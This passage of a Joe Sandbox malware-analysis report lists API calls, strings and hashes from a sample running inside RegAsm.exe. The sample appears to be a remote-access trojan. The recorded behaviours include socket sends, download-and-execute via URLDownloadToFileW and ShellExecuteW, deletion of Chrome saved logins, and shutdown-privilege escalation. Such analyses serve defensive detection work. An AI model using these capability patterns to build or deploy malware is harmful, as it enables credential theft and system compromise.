                                                                  • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                  • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                                  APIs
                                                                  • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                                                                  • RegCloseKey.ADVAPI32(?), ref: 004140A9
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                  • API String ID: 2127411465-314212984
                                                                  • Opcode ID: d8728620bcedfbf95b0a0fc4e553f00c45b98f8cdcebe4b8e1ae684bfe74d4de
                                                                  • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                                                  • Opcode Fuzzy Hash: d8728620bcedfbf95b0a0fc4e553f00c45b98f8cdcebe4b8e1ae684bfe74d4de
                                                                  • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00449212
                                                                  • _free.LIBCMT ref: 00449236
                                                                  • _free.LIBCMT ref: 004493BD
                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                  • _free.LIBCMT ref: 00449589
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                  • String ID:
                                                                  • API String ID: 314583886-0
                                                                  • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                                                  • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                                                  • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                                                  • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                                                  APIs
                                                                    • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                    • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                    • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                    • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                    • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                                  • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                  • API String ID: 1589313981-2876530381
                                                                  • Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                                                  • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                                  • Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                                                  • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                                  APIs
                                                                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                                  • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                                  • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID: ACP$OCP$['E
                                                                  • API String ID: 2299586839-2532616801
                                                                  • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                  • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                                  • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                  • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                                  APIs
                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                                  • GetLastError.KERNEL32 ref: 0040BA58
                                                                  Strings
                                                                  • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                                  • UserProfile, xrefs: 0040BA1E
                                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteErrorFileLast
                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                  • API String ID: 2018770650-1062637481
                                                                  • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                                                  • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                                                  • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                                                  • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                  • GetLastError.KERNEL32 ref: 0041799D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                  • String ID: SeShutdownPrivilege
                                                                  • API String ID: 3534403312-3733053543
                                                                  • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                  • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                                  • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                  • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00409258
                                                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                                  • FindClose.KERNEL32(00000000), ref: 004093C1
                                                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                  • FindClose.KERNEL32(00000000), ref: 004095B9
                                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                  • String ID:
                                                                  • API String ID: 1824512719-0
                                                                  • Opcode ID: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                                                                  • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                                  • Opcode Fuzzy Hash: 79a333ab798d4f3832fd98009e5fc83f15b4850663dec53ce8833ea938511d01
                                                                  • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                                  APIs
                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                                                  • String ID:
                                                                  • API String ID: 276877138-0
                                                                  • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                                  • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                                  • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                                  • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F3DE,00000000), ref: 0041B4B9
                                                                  • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                                  • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                  • String ID: SETTINGS
                                                                  • API String ID: 3473537107-594951305
                                                                  • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                  • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                                  • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                  • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040966A
                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                  • String ID:
                                                                  • API String ID: 1157919129-0
                                                                  • Opcode ID: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                                                                  • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                                  • Opcode Fuzzy Hash: fb173912142d451d8169f8852f62cc003beda93b99b20e6bd32f4a4dc40a9ea1
                                                                  • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00408811
                                                                  • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                  • String ID:
                                                                  • API String ID: 1771804793-0
                                                                  • Opcode ID: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                                                  • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                                  • Opcode Fuzzy Hash: 8f16439d90f6ec0f7283b04e08810252f4f5a069acaf261fa4213b3c41c94a9d
                                                                  • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DownloadExecuteFileShell
                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                  • API String ID: 2825088817-3056885514
                                                                  • Opcode ID: d08d3887d54a038e956607be4ed5306b9f9ca79097eafe3ebd10aa0618e8ef3a
                                                                  • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                                  • Opcode Fuzzy Hash: d08d3887d54a038e956607be4ed5306b9f9ca79097eafe3ebd10aa0618e8ef3a
                                                                  • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileFind$FirstNextsend
                                                                  • String ID: XPG$XPG
                                                                  • API String ID: 4113138495-1962359302
                                                                  • Opcode ID: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
                                                                  • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                                  • Opcode Fuzzy Hash: ef4afc18dc9d34da461ea20a285219582541565e32a666253127ded6bb227160
                                                                  • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                    • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                    • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                                    • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateInfoParametersSystemValue
                                                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                  • API String ID: 4127273184-3576401099
                                                                  • Opcode ID: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                                                  • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                                  • Opcode Fuzzy Hash: a5c334ccb2f3e0acc440ce1cf8f28a98e6381df3e21f2f51dd4c73347d747d37
                                                                  • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                                  APIs
                                                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                  • String ID: sJD
                                                                  • API String ID: 1661935332-3536923933
                                                                  • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                  • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                                                  • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                  • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                                                  APIs
                                                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                    • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                  • String ID:
                                                                  • API String ID: 2829624132-0
                                                                  • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                                  • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                                                  • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                                  • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                                                  APIs
                                                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC24
                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                  • String ID:
                                                                  • API String ID: 3906539128-0
                                                                  • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                  • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                                  • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                  • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                                                  • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                                                  • ExitProcess.KERNEL32 ref: 004432EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Process$CurrentExitTerminate
                                                                  • String ID:
                                                                  • API String ID: 1703294689-0
                                                                  • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                  • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                                                  • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                                  • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Clipboard$CloseDataOpen
                                                                  • String ID:
                                                                  • API String ID: 2058664381-0
                                                                  • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                                  • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                                  • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                                  • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.873315783.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .
                                                                  • API String ID: 0-248832578
                                                                  • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                                  • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                                                  • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                                  • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                                                  APIs
                                                                    • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                  • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                                                  Strings
                                                                  Memory Dump Source
